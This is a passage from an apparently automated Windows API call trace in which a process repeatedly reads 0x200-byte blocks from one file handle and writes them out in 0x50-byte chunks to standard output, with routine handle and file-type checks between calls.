lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.736] GetFileType (hFile=0x4c) returned 0x1 [0140.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.736] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.737] GetFileType (hFile=0x4c) returned 0x1 [0140.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.737] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.737] GetFileType (hFile=0x4c) returned 0x1 [0140.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.737] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.737] GetFileType (hFile=0x4c) returned 0x1 [0140.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.737] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.738] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] GetFileType (hFile=0x4c) returned 0x1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] GetFileType (hFile=0x4c) returned 0x1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] GetFileType (hFile=0x4c) returned 0x1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] GetFileType (hFile=0x4c) returned 0x1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] GetFileType (hFile=0x4c) returned 0x1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] GetFileType (hFile=0x4c) returned 0x1 [0140.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.738] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] GetFileType (hFile=0x4c) returned 0x1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] GetFileType (hFile=0x4c) returned 0x1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.739] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] GetFileType (hFile=0x4c) returned 0x1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] GetFileType (hFile=0x4c) returned 0x1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] GetFileType (hFile=0x4c) returned 0x1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.739] GetFileType (hFile=0x4c) returned 0x1 [0140.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] GetFileType (hFile=0x4c) returned 0x1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] GetFileType (hFile=0x4c) returned 0x1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] GetFileType (hFile=0x4c) returned 0x1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] GetFileType (hFile=0x4c) returned 0x1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.740] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.740] GetFileType (hFile=0x4c) returned 0x1 [0140.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] GetFileType (hFile=0x4c) returned 0x1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] GetFileType (hFile=0x4c) returned 0x1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] GetFileType (hFile=0x4c) returned 0x1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] GetFileType (hFile=0x4c) returned 0x1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] GetFileType (hFile=0x4c) returned 0x1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] GetFileType (hFile=0x4c) returned 0x1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.741] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] GetFileType (hFile=0x4c) returned 0x1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.742] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.742] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.742] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] GetFileType (hFile=0x4c) returned 0x1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] GetFileType (hFile=0x4c) returned 0x1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] GetFileType (hFile=0x4c) returned 0x1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] GetFileType (hFile=0x4c) returned 0x1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] GetFileType (hFile=0x4c) returned 0x1 [0140.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.742] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] GetFileType (hFile=0x4c) returned 0x1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] GetFileType (hFile=0x4c) returned 0x1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] GetFileType (hFile=0x4c) returned 0x1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.743] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] GetFileType (hFile=0x4c) returned 0x1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] GetFileType (hFile=0x4c) returned 0x1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.743] GetFileType (hFile=0x4c) returned 0x1 [0140.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] GetFileType (hFile=0x4c) returned 0x1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] GetFileType (hFile=0x4c) returned 0x1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] GetFileType (hFile=0x4c) returned 0x1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] GetFileType (hFile=0x4c) returned 0x1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] GetFileType (hFile=0x4c) returned 0x1 [0140.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.744] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.745] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] GetFileType (hFile=0x4c) returned 0x1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] GetFileType (hFile=0x4c) returned 0x1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] GetFileType (hFile=0x4c) returned 0x1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] GetFileType (hFile=0x4c) returned 0x1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] GetFileType (hFile=0x4c) returned 0x1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] GetFileType (hFile=0x4c) returned 0x1 [0140.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.745] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] GetFileType (hFile=0x4c) returned 0x1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] GetFileType (hFile=0x4c) returned 0x1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] WriteFile (in: hFile=0x4c, lpBuffer=0x18f068*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f068*, lpNumberOfBytesWritten=0x18e06c*=0x20, lpOverlapped=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e058 | out: lpNewFilePointer=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.746] ReadFile (in: hFile=0x54, lpBuffer=0x18ee88, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e078, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesRead=0x18e078*=0x200, lpOverlapped=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] GetFileType (hFile=0x4c) returned 0x1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] GetFileType (hFile=0x4c) returned 0x1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ee88*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] GetFileType (hFile=0x4c) returned 0x1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] WriteFile (in: hFile=0x4c, lpBuffer=0x18eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18eed8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] GetFileType (hFile=0x4c) returned 0x1 [0140.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.746] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef28*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] GetFileType (hFile=0x4c) returned 0x1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18ef78*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] GetFileType (hFile=0x4c) returned 0x1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] WriteFile (in: hFile=0x4c, lpBuffer=0x18efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18efc8*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] GetFileType (hFile=0x4c) returned 0x1 [0140.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.747] WriteFile (in: hFile=0x4c, lpBuffer=0x18f018*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e06c, lpOverlapped=0x0 | out: lpBuffer=0x18f018*, lpNumberOfBytesWritten=0x18e06c*=0x50, lpOverlapped=0x0) returned 1 [0140.747] 